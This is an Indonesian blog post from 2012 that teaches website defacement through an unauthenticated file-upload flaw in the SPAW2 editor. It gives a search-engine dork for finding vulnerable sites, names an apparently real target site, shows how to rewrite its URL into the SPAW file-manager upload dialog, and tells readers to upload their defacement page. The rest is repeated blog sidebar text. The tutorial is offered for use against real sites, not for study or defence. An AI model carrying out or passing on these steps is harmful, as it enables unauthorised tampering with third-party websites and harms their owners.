RIZKI: Deface Spaw Upload Vulnerably

Senin, 10 September 2012

Deface Spaw Upload Vulnerably

Banyak exploit yang dapat mengupload file secara langsung, ok kali ini kami memberi tutorial sekaligus cara menggunakan exploit itu.

dorknya :

inurl:”spaw2/dialogs/” OR inurl:”spaw2/uploads/files/”

Jika sudah dapat targetny, contoh targetnya :

http://climatechange.jgsee.org/Admin/spaw2/uploads/files/CC%20Book/ชุดความรู้%20CC%20Vol2.pdf

bagian : spaw2/uploads/files/CC Book/ชุดความรู้ CC Vol2.pdf

GANTI DENGAN

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

MAKA HASILNYA SEPERTI INI

http://climatechange.jgsee.org/Admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Akan tampil halaman untuk upload File.
Ganti menjadi files pada lokasi penyimpanan.
Browse file design Deface kamu, & upload.
Apabila file sukses diupload.akan terlihat file uploadtan tadi…

thx to code scurity

Pencarian

Arsip

Entri Populer

RIZKI

Senin, 10 September 2012

Deface Spaw Upload Vulnerably

0 komentar:

Posting Komentar

SMS ONLINE

Translate

Follow

Pencarian

Arsip

Entri Populer

RIZKI

Langgan

Senin, 10 September 2012

Deface Spaw Upload Vulnerably

0 komentar:

Posting Komentar

SMS ONLINE

Translate

Follow